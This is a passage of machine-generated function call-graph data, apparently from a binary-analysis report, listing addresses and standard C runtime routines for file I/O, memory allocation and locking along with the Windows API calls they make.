6920->6927 6926 f24753 __wsopen_helper 6926->6918 6928 f2442f __lock 58 API calls 6927->6928 6929 f21927 6928->6929 6930 f24764 DecodePointer DecodePointer 6929->6930 6931 f24741 6930->6931 6932 f24791 6930->6932 6941 f2475e 6931->6941 6932->6931 6944 f27421 6932->6944 6934 f247f4 EncodePointer EncodePointer 6934->6931 6935 f247a3 6935->6934 6936 f247c8 6935->6936 6951 f248f8 6935->6951 6936->6931 6938 f248f8 __realloc_crt 61 API calls 6936->6938 6940 f247e2 EncodePointer 6936->6940 6939 f247dc 6938->6939 6939->6931 6939->6940 6940->6934 6978 f21929 6941->6978 6945 f2742a 6944->6945 6946 f2743f HeapSize 6944->6946 6947 f21cc3 _memcpy_s 58 API calls 6945->6947 6946->6935 6948 f2742f 6947->6948 6949 f21e89 _memcpy_s 9 API calls 6948->6949 6950 f2743a 6949->6950 6950->6935 6953 f248ff 6951->6953 6954 f2493c 6953->6954 6956 f27452 6953->6956 6977 f243a9 Sleep 6953->6977 6954->6936 6957 f27466 6956->6957 6958 f2745b 6956->6958 6959 f2746e 6957->6959 6966 f2747b 6957->6966 6960 f2114b _malloc 58 API calls 6958->6960 6961 f24831 _free 58 API calls 6959->6961 6962 f27463 6960->6962 6976 f27476 __dosmaperr 6961->6976 6962->6953 6963 f274b3 6965 f21741 _malloc DecodePointer 6963->6965 6964 f27483 HeapReAlloc 6964->6966 6964->6976 6967 f274b9 6965->6967 6966->6963 6966->6964 6968 f274e3 6966->6968 6970 f21741 _malloc DecodePointer 6966->6970 6973 f274cb 6966->6973 6969 f21cc3 _memcpy_s 58 API calls 6967->6969 6971 f21cc3 _memcpy_s 58 API calls 6968->6971 6969->6976 6970->6966 6972 f274e8 GetLastError 6971->6972 6972->6976 6974 f21cc3 _memcpy_s 58 API calls 6973->6974 6975 f274d0 GetLastError 6974->6975 6975->6976 6976->6953 6977->6953 6981 f24599 LeaveCriticalSection 6978->6981 6980 f21930 6980->6926 6981->6980 6988 f211f2 6982->6988 6984 f21025 VirtualAlloc 6985 f21481 6984->6985 7504 f2149c 6985->7504 6987 f21497 6987->6591 6991 f211fe __wsopen_helper 6988->6991 6989 f21211 6990 f21cc3 _memcpy_s 58 API calls 6989->6990 6992 f21216 6990->6992 6991->6989 6993 f21242 6991->6993 6994 f21e89 _memcpy_s 9 API calls 6992->6994 7007 f22034 6993->7007 7004 f21221 __wsopen_helper @_EH4_CallFilterFunc@8 6994->7004 6996 f21247 6997 f21250 6996->6997 6998 f2125d 6996->6998 6999 f21cc3 _memcpy_s 58 API calls 6997->6999 7000 f21287 6998->7000 7001 f21267 6998->7001 6999->7004 7022 f22153 7000->7022 7002 f21cc3 _memcpy_s 58 API calls 7001->7002 7002->7004 7004->6984 7008 f22040 __wsopen_helper 7007->7008 7009 f2442f __lock 58 API calls 7008->7009 7010 f2204e 7009->7010 7011 f220c9 7010->7011 7017 f244b7 __mtinitlocknum 58 API calls 7010->7017 7020 f220c2 7010->7020 7043 f21f9d 7010->7043 7048 f22007 7010->7048 7012 f248b1 __malloc_crt 58 API calls 7011->7012 7014 f220d0 7012->7014 7016 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7014->7016 7014->7020 7015 f2213f __wsopen_helper 7015->6996 7019 f220f6 EnterCriticalSection 7016->7019 7017->7010 7019->7020 7040 f2214a 7020->7040 7031 f22173 __wopenfile 7022->7031 7023 f2218d 7024 f21cc3 _memcpy_s 58 API calls 7023->7024 7025 f22192 7024->7025 7027 f21e89 _memcpy_s 9 API calls 7025->7027 7026 f22348 7026->7023 7029 f223ab 7026->7029 7028 f21292 7027->7028 7037 f212b4 7028->7037 7055 f2625f 7029->7055 7031->7023 7031->7026 7058 f262b3 7031->7058 7034 f262b3 __wcsnicmp 60 API calls 7035 f22360 7034->7035 7035->7026 7036 f262b3 __wcsnicmp 60 API calls 7035->7036 7036->7026 7497 f21fcd 7037->7497 7039 f212ba 7039->7004 7053 f24599 LeaveCriticalSection 7040->7053 7042 f22151 7042->7015 7044 f21fa8 7043->7044 7045 f21fbe EnterCriticalSection 7043->7045 7046 f2442f __lock 58 API calls 7044->7046 7045->7010 7047 f21fb1 7046->7047 7047->7010 7049 f22015 7048->7049 7050 f22028 LeaveCriticalSection 7048->7050 7054 f24599 LeaveCriticalSection 7049->7054 7050->7010 7052 f22025 7052->7010 7053->7042 7054->7052 7066 f25a43 7055->7066 7057 f26278 7057->7028 7059 f26351 7058->7059 7061 f262c5 7058->7061 7409 f26369 7059->7409 7062 f21cc3 _memcpy_s 58 API calls 7061->7062 7065 f22341 7061->7065 7063 f262de 7062->7063 7064 f21e89 _memcpy_s 9 API calls 7063->7064 7064->7065 7065->7026 7065->7034 7069 f25a4f __wsopen_helper 7066->7069 7067 f25a65 7068 f21cc3 _memcpy_s 58 API calls 7067->7068 7070 f25a6a 7068->7070 7069->7067 7071 f25a9b 7069->7071 7073 f21e89 _memcpy_s 9 API calls 7070->7073 7077 f25b0c 7071->7077 7076 f25a74 __wsopen_helper 7073->7076 7074 f25ab7 7151 f25ae0 7074->7151 7076->7057 7078 f25b2c 7077->7078 7155 f28a18 7078->7155 7080 f25c7f 7081 f21e99 __invoke_watson 8 API calls 7080->7081 7082 f2625e 7081->7082 7084 f25a43 __wsopen_helper 103 API calls 7082->7084 7083 f25b48 7083->7080 7085 f25b82 7083->7085 7091 f25ba5 7083->7091 7086 f26278 7084->7086 7186 f21c8f 7085->7186 7086->7074 7089 f21cc3 _memcpy_s 58 API calls 7090 f25b94 7089->7090 7093 f21e89 _memcpy_s 9 API calls 7090->7093 7092 f25c63 7091->7092 7100 f25c41 7091->7100 7094 f21c8f __commit 58 API calls 7092->7094 7095 f25b9e 7093->7095 7096 f25c68 7094->7096 7095->7074 7097 f21cc3 _memcpy_s 58 API calls 7096->7097 7098 f25c75 7097->7098 7099 f21e89 _memcpy_s 9 API calls 7098->7099 7099->7080 7162 f26d16 7100->7162 7102 f25d0f 7103 f25d19 7102->7103 7104 f25d3c 7102->7104 7106 f21c8f __commit 58 API calls 7103->7106 7180 f259bb 7104->7180 7107 f25d1e 7106->7107 7109 f21cc3 _memcpy_s 58 API calls 7107->7109 7108 f25ddc GetFileType 7110 f25de7 GetLastError 7108->7110 7111 f25e29 7108->7111 7113 f25d28 7109->7113 7114 f21ca2 __dosmaperr 58 API calls 7110->7114 7194 f26fac 7111->7194 7112 f25daa GetLastError 7189 f21ca2 7112->7189 7117 f21cc3 _memcpy_s 58 API calls 7113->7117 7118 f25e0e CloseHandle 7114->7118 7117->7095 7120 f25dcf 7118->7120 7121 f25e1c 7118->7121 7119 f259bb ___createFile 3 API calls 7122 f25d9f 7119->7122 7125 f21cc3 _memcpy_s 58 API calls 7120->7125 7124 f21cc3 _memcpy_s 58 API calls 7121->7124 7122->7108 7122->7112 7126 f25e21 7124->7126 7125->7080 7126->7120 7129 f26002 7129->7080 7131 f261d5 CloseHandle 7129->7131 7132 f259bb ___createFile 3 API calls 7131->7132 7134 f261fc 7132->7134 7133 f25ec8 7133->7129 7140 f22a2a 70 API calls __read_nolock 7133->7140 7143 f27054 60 API calls __lseeki64_nolock 7133->7143 7145 f2607f 7133->7145 7148 f25ed0 7133->7148 7258 f27d99 7133->7258 7136 f26204 GetLastError 7134->7136 7150 f2608c 7134->7150 7135 f21c8f __commit 58 API calls 7135->7133 7137 f21ca2 __dosmaperr 58 API calls 7136->7137 7138 f26210 7137->7138 7286 f26ebf 7138->7286 7140->7133 7143->7133 7146 f2897e __close_nolock 61 API calls 7145->7146 7147 f26086 7146->7147 7149 f21cc3 _memcpy_s 58 API calls 7147->7149 7148->7133 7212 f2897e 7148->7212 7227 f286ed 7148->7227 7149->7150 7150->7080 7152 f25ae6 7151->7152 7154 f25b0a 7151->7154 7408 f2702e LeaveCriticalSection 7152->7408 7154->7076 7156 f28a22 7155->7156 7157 f28a37 7155->7157 7158 f21cc3 _memcpy_s 58 API calls 7156->7158 7157->7083 7159 f28a27 7158->7159 7160 f21e89 _memcpy_s 9 API calls 7159->7160 7161 f28a32 7160->7161 7161->7083 7163 f26d22 __wsopen_helper 7162->7163 7164 f244b7 __mtinitlocknum 58 API calls 7163->7164 7165 f26d33 7164->7165 7166 f2442f __lock 58 API calls 7165->7166 7167 f26d38 __wsopen_helper 7165->7167 7176 f26d46 7166->7176 7167->7102 7168 f26e94 7307 f26eb6 7168->7307 7170 f26e26 7171 f24869 __calloc_crt 58 API calls 7170->7171 7175 f26e2f 7171->7175 7172 f26dc6 EnterCriticalSection 7174 f26dd6 LeaveCriticalSection 7172->7174 7172->7176 7173 f2442f __lock 58 API calls 7173->7176 7174->7176 7175->7168 7298 f26c88 7175->7298 7176->7168 7176->7170 7176->7172 7176->7173 7178 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7176->7178 7295 f26dee 7176->7295 7178->7176 7181 f259c6 ___crtIsPackagedApp 7180->7181 7182 f25a21 CreateFileW 7181->7182 7183 f259ca GetModuleHandleW GetProcAddress 7181->7183 7184 f25a3f 7182->7184 7185 f259e7 7183->7185 7184->7108 7184->7112 7184->7119 7185->7184 7187 f236f3 __getptd_noexit 58 API calls 7186->7187 7188 f21c94 7187->7188 7188->7089 7190 f21c8f __commit 58 API calls 7189->7190 7191 f21cab __dosmaperr 7190->7191 7192 f21cc3 _memcpy_s 58 API calls 7191->7192 7193 f21cbe 7192->7193 7193->7120 7195 f27014 7194->7195 7197 f26fb8 7194->7197 7196 f21cc3 _memcpy_s 58 API calls 7195->7196 7198 f27019 7196->7198 7197->7195 7202 f26fda 7197->7202 7199 f21c8f __commit 58 API calls 7198->7199 7200 f25e47 7199->7200 7200->7129 7200->7133 7203 f27054 7200->7203 7201 f26fff SetStdHandle 7201->7200 7202->7200 7202->7201 7315 f26f45 7203->7315 7205 f27064 7206 f2706c 7205->7206 7207 f2707d SetFilePointerEx 7205->7207 7208 f21cc3 _memcpy_s 58 API calls 7206->7208 7209 f27095 GetLastError 7207->7209 7210 f25eb1 7207->7210 7208->7210 7211 f21ca2 __dosmaperr 58 API calls 7209->7211 7210->7133 7210->7135 7211->7210 7213 f26f45 __commit 58 API calls 7212->7213 7216 f2898c 7213->7216 7214 f289e2 7215 f26ebf __free_osfhnd 59 API calls 7214->7215 7221 f289ea 7215->7221 7216->7214 7218 f26f45 __commit 58 API calls 7216->7218 7226 f289c0 7216->7226 7217 f26f45 __commit 58 API calls 7219 f289cc CloseHandle 7217->7219 7222 f289b7 7218->7222 7219->7214 7223 f289d8 GetLastError 7219->7223 7220 f28a0c 7220->7148 7221->7220 7224 f21ca2 __dosmaperr 58 API calls 7221->7224 7225 f26f45 __commit 58 API calls 7222->7225 7223->7214 7224->7220 7225->7226 7226->7214 7226->7217 7228 f27054 __lseeki64_nolock 60 API calls 7227->7228 7229 f2870a 7228->7229 7231 f27054 __lseeki64_nolock 60 API calls 7229->7231 7239 f2876f 7229->7239 7230 f21cc3 _memcpy_s 58 API calls 7241 f2877a 7230->7241 7232 f28726 7231->7232 7233 f2874f GetProcessHeap HeapAlloc 7232->7233 7234 f2880e 7232->7234 7232->7239 7236 f2876a 7233->7236 7247 f28783 __setmode_nolock 7233->7247 7235 f28874 7234->7235 7240 f27054 __lseeki64_nolock 60 API calls 7234->7240 7237 f27054 __lseeki64_nolock 60 API calls 7235->7237 7235->7239 7238 f21cc3 _memcpy_s 58 API calls 7236->7238 7237->7239 7238->7239 7239->7230 7239->7241 7242 f28826 7240->7242 7241->7148 7242->7239 7243 f26f45 __commit 58 API calls 7242->7243 7244 f2883a SetEndOfFile 7243->7244 7244->7235 7246 f2885a 7244->7246 7248 f21cc3 _memcpy_s 58 API calls 7246->7248 7250 f287d4 7247->7250 7252 f287e3 __setmode_nolock 7247->7252 7328 f27e88 7247->7328 7249 f2885f 7248->7249 7251 f21c8f __commit 58 API calls 7249->7251 7253 f21c8f __commit 58 API calls 7250->7253 7254 f2886a GetLastError 7251->7254 7256 f287f8 GetProcessHeap HeapFree 7252->7256 7255 f287d9 7253->7255 7254->7235 7255->7252 7257 f21cc3 _memcpy_s 58 API calls 7255->7257 7256->7235 7257->7252 7259 f27da5 __wsopen_helper 7258->7259 7260 f27db2 7259->7260 7261 f27dc9 7259->7261 7262 f21c8f __commit 58 API calls 7260->7262 7263 f27e68 7261->7263 7265 f27ddd 7261->7265 7264 f27db7 7262->7264 7266 f21c8f __commit 58 API calls 7263->7266 7268 f21cc3 _memcpy_s 58 API calls 7264->7268 7269 f27e05 7265->7269 7270 f27dfb 7265->7270 7267 f27e00 7266->7267 7273 f21cc3 _memcpy_s 58 API calls 7267->7273 7281 f27dbe __wsopen_helper 7268->7281 7271 f26c88 ___lock_fhandle 59 API calls 7269->7271 7272 f21c8f __commit 58 API calls 7270->7272 7274 f27e0b 7271->7274 7272->7267 7275 f27e74 7273->7275 7276 f27e31 7274->7276 7277 f27e1e 7274->7277 7278 f21e89 _memcpy_s 9 API calls 7275->7278 7280 f21cc3 _memcpy_s 58 API calls 7276->7280 7279 f27e88 __write_nolock 76 API calls 7277->7279 7278->7281 7282 f27e2a 7279->7282 7283 f27e36 7280->7283 7281->7133 7404 f27e60 7282->7404 7284 f21c8f __commit 58 API calls 7283->7284 7284->7282 7287 f26f2b 7286->7287 7288 f26ecb 7286->7288 7289 f21cc3 _memcpy_s 58 API calls 7287->7289 7288->7287 7293 f26ef4 7288->7293 7290 f26f30 7289->7290 7291 f21c8f __commit 58 API calls 7290->7291 7292 f26f1c 7291->7292 7292->7150 7293->7292 7294 f26f16 SetStdHandle 7293->7294 7294->7292 7310 f24599 LeaveCriticalSection 7295->7310 7297 f26df5 7297->7176 7299 f26c94 __wsopen_helper 7298->7299 7300 f26ce3 EnterCriticalSection 7299->7300 7302 f2442f __lock 58 API calls 7299->7302 7301 f26d09 __wsopen_helper 7300->7301 7301->7168 7303 f26cb9 7302->7303 7305 f240a2 __mtinitlocknum InitializeCriticalSectionAndSpinCount 7303->7305 7306 f26cd1 7303->7306 7305->7306 7311 f26d0d 7306->7311 7314 f24599 LeaveCriticalSection 7307->7314 7309 f26ebd 7309->7167 7310->7297 7312 f24599 _doexit LeaveCriticalSection 7311->7312 7313 f26d14 7312->7313 7313->7300 7314->7309 7316 f26f50 7315->7316 7318 f26f65 7315->7318 7317 f21c8f __commit 58 API calls 7316->7317 7319 f26f55 7317->7319 7320 f21c8f __commit 58 API calls 7318->7320 7322 f26f8a 7318->7322 7321 f21cc3 _memcpy_s 58 API calls 7319->7321 7323 f26f94 7320->7323 7324 f26f5d 7321->7324 7322->7205 7325 f21cc3 _memcpy_s 58 API calls 7323->7325 7324->7205 7326 f26f9c 7325->7326 7327 f21e89 _memcpy_s 9 API calls 7326->7327 7327->7324 7329 f27e95 __write_nolock 7328->7329 7330 f27ef3 7329->7330 7331 f27ed4 7329->7331 7361 f27ec9 7329->7361 7334 f27f4b 7330->7334 7335 f27f2f 7330->7335 7333 f21c8f __commit 58 API calls 7331->7333 7332 f25770 __crtLCMapStringA_stat 6 API calls 7336 f286e9 7332->7336 7337 f27ed9 7333->7337 7339 f27f64 7334->7339 7343 f27054 __lseeki64_nolock 60 API calls 7334->7343 7338 f21c8f __commit 58 API calls 7335->7338 7336->7247 7340 f21cc3 _memcpy_s 58 API calls 7337->7340 7342 f27f34 7338->7342 7387 f26c34 7339->7387 7344 f27ee0 7340->7344 7347 f21cc3 _memcpy_s 58 API calls 7342->7347 7343->7339 7345 f21e89 _memcpy_s 9 API calls 7344->7345 7345->7361 7346 f27f72 7348 f282cb 7346->7348 7396 f236db 7346->7396 7349 f27f3b 7347->7349 7350 f282e9 7348->7350 7351 f2865e WriteFile 7348->7351 7352 f21e89 _memcpy_s 9 API calls 7349->7352 7354 f2840d 7350->7354 7363 f282ff 7350->7363 7355 f282be GetLastError 7351->7355 7360 f2828b 7351->7360 7352->7361 7367 f28418 7354->7367 7378 f28502 7354->7378 7355->7360 7357 f28697 7359 f21cc3 _memcpy_s 58 API calls 7357->7359 7357->7361 7358 f27fdd 7358->7348 7362 f27fed GetConsoleCP 7358->7362 7365 f286c5 7359->7365 7360->7357 7360->7361 7366 f283eb 7360->7366 7361->7332 7362->7357 7384 f2801c 7362->7384 7363->7357 7363->7360 7364 f2836e WriteFile 7363->7364 7364->7355 7364->7363 7369 f21c8f __commit 58 API calls 7365->7369 7370 f283f6 7366->7370 7371 f2868e 7366->7371 7367->7357 7367->7360 7368 f2847d WriteFile 7367->7368 7368->7355 7368->7367 7369->7361 7373 f21cc3 _memcpy_s 58 API calls 7370->7373 7374 f21ca2 __dosmaperr 58 API calls 7371->7374 7372 f28577 WideCharToMultiByte 7372->7355 7372->7378 7376 f283fb 7373->7376 7374->7361 7375 f285c6 WriteFile 7375->7378 7379 f28619 GetLastError 7375->7379 7380 f21c8f __commit 58 API calls 7376->7380 7378->7357 7378->7360 7378->7372 7378->7375 7379->7378 7380->7361 7381 f292bb 60 API calls __write_nolock 7381->7384 7382 f28105 WideCharToMultiByte 7382->7360 7383 f28140 WriteFile 7382->7383 7383->7355 7383->7384 7384->7355 7384->7360 7384->7381 7384->7382 7385 f292d3 WriteConsoleW CreateFileW __putwch_nolock 7384->7385 7386 f2819a WriteFile 7384->7386 7401 f291b5 7384->7401 7385->7384 7386->7355 7386->7384 7388 f26c3f 7387->7388 7389 f26c4c 7387->7389 7390 f21cc3 _memcpy_s 58 API calls 7388->7390 7392 f26c58 7389->7392 7393 f21cc3 _memcpy_s 58 API calls 7389->7393 7391 f26c44 7390->7391 7391->7346 7392->7346 7394 f26c79 7393->7394 7395 f21e89 _memcpy_s 9 API calls 7394->7395 7395->7391 7397 f236f3 __getptd_noexit 58 API calls 7396->7397 7398 f236e1 7397->7398 7399 f236ee GetConsoleMode 7398->7399 7400 f217be __lock 58 API calls 7398->7400 7399->7348 7399->7358 7400->7399 7402 f2917b __isleadbyte_l 58 API calls 7401->7402 7403 f291c2 7402->7403 7403->7384 7407 f2702e LeaveCriticalSection 7404->7407 7406 f27e66 7406->7281 7407->7406 7408->7154 7410 f2637d 7409->7410 7419 f26394 7409->7419 7411 f26384 7410->7411 7412 f263a5 7410->7412 7413 f21cc3 _memcpy_s 58 API calls 7411->7413 7420 f24bfc 7412->7420 7415 f26389 7413->7415 7416 f21e89 _memcpy_s 9 API calls 7415->7416 7416->7419 7417 f28b0f 60 API calls __towlower_l 7418 f263b0 7417->7418 7418->7417 7418->7419 7419->7065 7421 f24c0d 7420->7421 7425 f24c5a 7420->7425 7422 f236db __setmbcp 58 API calls 7421->7422 7423 f24c13 7422->7423 7424 f24c3a 7423->7424 7428 f27356 7423->7428 7424->7425 7443 f24f1d 7424->7443 7425->7418 7429 f27362 __wsopen_helper 7428->7429 7430 f236db __setmbcp 58 API calls 7429->7430 7431 f2736b 7430->7431 7432 f2739a 7431->7432 7434 f2737e 7431->7434 7433 f2442f __lock 58 API calls 7432->7433 7435 f273a1 7433->7435 7436 f236db __setmbcp 58 API calls 7434->7436 7455 f273d6 7435->7455 7437 f27383 7436->7437 7440 f27391 __wsopen_helper 7437->7440 7442 f217be __lock 58 API calls 7437->7442 7440->7424 7442->7440 7444 f24f29 __wsopen_helper 7443->7444 7445 f236db __setmbcp 58 API calls 7444->7445 7446 f24f33 7445->7446 7447 f24f45 7446->7447 7448 f2442f __lock 58 API calls 7446->7448 7449 f24f53 __wsopen_helper 7447->7449 7451 f217be __lock 58 API calls 7447->7451 7453 f24f63 7448->7453 7449->7425 7450 f24f90 7493 f24fba 7450->7493 7451->7449 7453->7450 7454 f24831 _free 58 API calls 7453->7454 7454->7450 7456 f273b5 7455->7456 7457 f273e1 ___addlocaleref ___removelocaleref 7455->7457 7459 f273cd 7456->7459 7457->7456 7462 f2715c 7457->7462 7492 f24599 LeaveCriticalSection 7459->7492 7461 f273d4 7461->7437 7463 f271d5 7462->7463 7465 f27171 7462->7465 7464 f24831 _free 58 API calls 7463->7464 7466 f27222 7463->7466 7467 f271f6 7464->7467 7465->7463 7468 f271a2 7465->7468 7476 f24831 _free 58 API calls 7465->7476 7469 f28d75 ___free_lc_time 58 API calls 7466->7469 7474 f2724b 7466->7474 7470 f24831 _free 58 API calls 7467->7470 7480 f24831 _free 58 API calls 7468->7480 7491 f271c0 7468->7491 7471 f27240 7469->7471 7473 f27209 7470->7473 7477 f24831 _free 58 API calls 7471->7477 7472 f272aa 7478 f24831 _free 58 API calls 7472->7478 7479 f24831 _free 58 API calls 7473->7479 7474->7472 7488 f24831 58 API calls _free 7474->7488 7475 f24831 _free 58 API calls 7481 f271ca 7475->7481 7482 f27197 7476->7482 7477->7474 7484 f272b0 7478->7484 7485 f27217 7479->7485 7486 f271b5 7480->7486 7487 f24831 _free 58 API calls 7481->7487 7483 f28c12 ___free_lconv_mon 58 API calls 7482->7483 7483->7468 7484->7456 7489 f24831 _free 58 API calls 7485->7489 7490 f28d0e ___free_lconv_num 58 API calls 7486->7490 7487->7463 7488->7474 7489->7466 7490->7491 7491->7475 7492->7461 7496 f24599 LeaveCriticalSection 7493->7496 7495 f24fc1 7495->7447 7496->7495 7498 f21ffb LeaveCriticalSection 7497->7498 7499 f21fdc 7497->7499 7498->7039 7499->7498 7500 f21fe3 7499->7500 7503 f24599 LeaveCriticalSection 7500->7503 7502 f21ff8 7502->7039 7503->7502 7505 f214a8 __wsopen_helper 7504->7505 7506 f214eb 7505->7506 7507 f214be _memset 7505->7507 7508 f214e3 __wsopen_helper 7505->7508 7517 f21f5e 7506->7517 7511 f21cc3 _memcpy_s 58 API calls 7507->7511 7508->6987 7513 f214d8 7511->7513 7515 f21e89 _memcpy_s 9 API calls 7513->7515 7515->7508 7518 f21f90 EnterCriticalSection 7517->7518 7519 f21f6e 7517->7519 7522 f214f1 7518->7522 7519->7518 7520 f21f76 7519->7520 7521 f2442f __lock 58 API calls 7520->7521 7521->7522 7523 f212bc 7522->7523 7527 f212d7 _memset 7523->7527 7529 f212f2 7523->7529 7524 f212e2 7525 f21cc3 _memcpy_s 58 API calls 7524->7525 7526 f212e7 7525->7526 7528 f21e89 _memcpy_s 9 API calls 7526->7528 7527->7524 7527->7529 7534 f21332 7527->7534 7528->7529 7537 f21525 7529->7537 7531 f21443 _memset 7535 f21cc3 _memcpy_s 58 API calls 7531->7535 7534->7529 7534->7531 7540 f22873 7534->7540 7547 f22a2a 7534->7547 7615 f22752 7534->7615 7635 f22897 7534->7635 7535->7526 7538 f21fcd __wfsopen 2 API calls 7537->7538 7539 f2152b 7538->7539 7539->7508 7541 f22892 7540->7541 7542 f2287d 7540->7542 7541->7534 7543 f21cc3 _memcpy_s 58 API calls 7542->7543 7544 f22882 7543->7544 7545 f21e89 _memcpy_s 9 API calls 7544->7545 7546 f2288d 7545->7546 7546->7534 7548 f22a62 7547->7548 7549 f22a4b 7547->7549 7551 f2319a 7548->7551 7556 f22a9c 7548->7556 7550 f21c8f __commit 58 API calls 7549->7550 7553 f22a50 7550->7553 7552 f21c8f __commit 58 API calls 7551->7552 7554 f2319f 7552->7554 7555 f21cc3 _memcpy_s 58 API calls 7553->7555 7558 f21cc3 _memcpy_s 58 API calls 7554->7558 7595 f22a57 7555->7595 7557 f22aa4 7556->7557 7564 f22abb 7556->7564 7559 f21c8f __commit 58 API calls 7557->7559 7560 f22ab0 7558->7560 7561 f22aa9 7559->7561 7562 f21e89 _memcpy_s 9 API calls 7560->7562 7565 f21cc3 _memcpy_s 58 API calls 7561->7565 7562->7595 7563 f22ad0 7566 f21c8f __commit 58 API calls 7563->7566 7564->7563 7567 f22aea 7564->7567 7568 f22b08 7564->7568 7564->7595 7565->7560 7566->7561 7567->7563 7570 f22af5 7567->7570 7569 f248b1 __malloc_crt 58 API calls 7568->7569 7571 f22b18 7569->7571 7572 f26c34 __read_nolock 58 API calls 7570->7572 7573 f22b20 7571->7573 7574 f22b3b 7571->7574 7575 f22c09 7572->7575 7576 f21cc3 _memcpy_s 58 API calls 7573->7576 7578 f27054 __lseeki64_nolock 60 API calls 7574->7578 7577 f22c82 ReadFile 7575->7577 7582 f22c1f GetConsoleMode 7575->7582 7579 f22b25 7576->7579 7580 f23162 GetLastError 7577->7580 7581 f22ca4 7577->7581 7578->7570 7583 f21c8f __commit 58 API calls 7579->7583 7584 f22c62 7580->7584 7585 f2316f 7580->7585 7581->7580 7589 f22c74 7581->7589 7586 f22c33 7582->7586 7587 f22c7f 7582->7587 7583->7595 7592 f21ca2 __dosmaperr 58 API calls 7584->7592 7597 f22c68 7584->7597 7588 f21cc3 _memcpy_s 58 API calls 7585->7588 7586->7587 7590 f22c39 ReadConsoleW 7586->7590 7587->7577 7593 f23174 7588->7593 7589->7597 7598 f22cd9 7589->7598 7599 f22f46 7589->7599 7590->7589 7591 f22c5c GetLastError 7590->7591 7591->7584 7592->7597 7594 f21c8f __commit 58 API calls 7593->7594 7594->7597 7595->7534 7596 f24831 _free 58 API calls 7596->7595 7597->7595 7597->7596 7601 f22d45 ReadFile 7598->7601 7607 f22dc6 7598->7607 7599->7597 7605 f2304c ReadFile 7599->7605 7602 f22d66 GetLastError 7601->7602 7609 f22d70 7601->7609 7602->7609 7603 f22e83 7611 f27054 __lseeki64_nolock 60 API calls 7603->7611 7613 f22e33 MultiByteToWideChar 7603->7613 7604 f22e73 7608 f21cc3 _memcpy_s 58 API calls 7604->7608 7606 f2306f GetLastError 7605->7606 7610 f2307d 7605->7610 7606->7610 7607->7597 7607->7603 7607->7604 7607->7613 7608->7597 7609->7598 7612 f27054 __lseeki64_nolock 60 API calls 7609->7612 7610->7599 7614 f27054 __lseeki64_nolock 60 API calls 7610->7614 7611->7613 7612->7609 7613->7591 7613->7597 7614->7610 7616 f2275d 7615->7616 7620 f22772 7615->7620 7617 f21cc3 _memcpy_s 58 API calls 7616->7617 7618 f22762 7617->7618 7619 f21e89 _memcpy_s 9 API calls 7618->7619 7626 f2276d 7619->7626 7621 f227a7 7620->7621 7620->7626 7682 f265a7 7620->7682 7623 f22873 __filbuf 58 API calls 7621->7623 7624 f227bb 7623->7624 7649 f22916 7624->7649 7626->7534 7627 f227c2 7627->7626 7628 f22873 __filbuf 58 API calls 7627->7628 7629 f227e5 7628->7629 7629->7626 7630 f22873 __filbuf 58 API calls 7629->7630 7631 f227f1 7630->7631 7631->7626 7632 f22873 __filbuf 58 API calls 7631->7632 7633 f227fe 7632->7633 7634 f22873 __filbuf 58 API calls 7633->7634 7634->7626 7636 f228a6 7635->7636 7645 f228a2 _memmove 7635->7645 7637 f228ad 7636->7637 7640 f228c0 _memset 7636->7640 7638 f21cc3 _memcpy_s 58 API calls 7637->7638 7639 f228b2 7638->7639 7641 f21e89 _memcpy_s 9 API calls 7639->7641 7642 f228f7 7640->7642 7643 f228ee 7640->7643 7640->7645 7641->7645 7642->7645 7647 f21cc3 _memcpy_s 58 API calls 7642->7647 7644 f21cc3 _memcpy_s 58 API calls 7643->7644 7646 f228f3 7644->7646 7645->7534 7648 f21e89 _memcpy_s 9 API calls 7646->7648 7647->7646 7648->7645 7650 f22922 __wsopen_helper 7649->7650 7651 f22946 7650->7651 7652 f2292f 7650->7652 7654 f22a0a 7651->7654 7656 f2295a 7651->7656 7653 f21c8f __commit 58 API calls 7652->7653 7655 f22934 7653->7655 7657 f21c8f __commit 58 API calls 7654->7657 7659 f21cc3 _memcpy_s 58 API calls 7655->7659 7660 f22985 7656->7660 7661 f22978 7656->7661 7658 f2297d 7657->7658 7666 f21cc3 _memcpy_s 58 API calls 7658->7666 7673 f2293b __wsopen_helper 7659->7673 7663 f22992 7660->7663 7664 f229a7 7660->7664 7662 f21c8f __commit 58 API calls 7661->7662 7662->7658 7667 f21c8f __commit 58 API calls 7663->7667 7665 f26c88 ___lock_fhandle 59 API calls 7664->7665 7668 f229ad 7665->7668 7669 f2299f 7666->7669 7670 f22997 7667->7670 7671 f229d3 7668->7671 7672 f229c0 7668->7672 7676 f21e89 _memcpy_s 9 API calls 7669->7676 7674 f21cc3 _memcpy_s 58 API calls 7670->7674 7677 f21cc3 _memcpy_s 58 API calls 7671->7677 7675 f22a2a __read_nolock 70 API calls 7672->7675 7673->7627 7674->7669 7678 f229cc 7675->7678 7676->7673 7679 f229d8 7677->7679 7685 f22a02 7678->7685 7680 f21c8f __commit 58 API calls 7679->7680 7680->7678 7683 f248b1 __malloc_crt 58 API calls 7682->7683 7684 f265bc 7683->7684 7684->7621 7688 f2702e LeaveCriticalSection 7685->7688 7687 f22a08 7687->7673 7688->7687 7692 f21932 7689->7692 7691 f217d9 7693 f2193e __wsopen_helper 7692->7693 7694 f2442f __lock 51 API calls 7693->7694 7695 f21945 7694->7695 7696 f219fe _doexit 7695->7696 7697 f21973 DecodePointer 7695->7697 7712 f21a4c 7696->7712 7697->7696 7699 f2198a DecodePointer 7697->7699 7705 f2199a 7699->7705 7701 f21a5b __wsopen_helper 7701->7691 7703 f219a7 EncodePointer 7703->7705 7704 f21a43 7706 f21a4c 7704->7706 7707 f217a8 _fast_error_exit 3 API calls 7704->7707 7705->7696 7705->7703 7708 f219b7 DecodePointer EncodePointer 7705->7708 7709 f21a59 7706->7709 7717 f24599 LeaveCriticalSection 7706->7717 7707->7706 7711 f219c9 DecodePointer DecodePointer 7708->7711 7709->7691 7711->7705 7713 f21a52 7712->7713 7714 f21a2c 7712->7714 7718 f24599 LeaveCriticalSection 7713->7718 7714->7701 7716 f24599 LeaveCriticalSection 7714->7716 7716->7704 7717->7709 7718->7714 8039 f28bc0 8040 f28bcc __wsopen_helper 8039->8040 8041 f28c03 __wsopen_helper 8040->8041 8042 f2442f __lock 58 API calls 8040->8042 8043 f28be0 8042->8043 8044 f273d6 __updatetlocinfoEx_nolock 58 API calls 8043->8044 8045 f28bf0 8044->8045 8047 f28c09 8045->8047 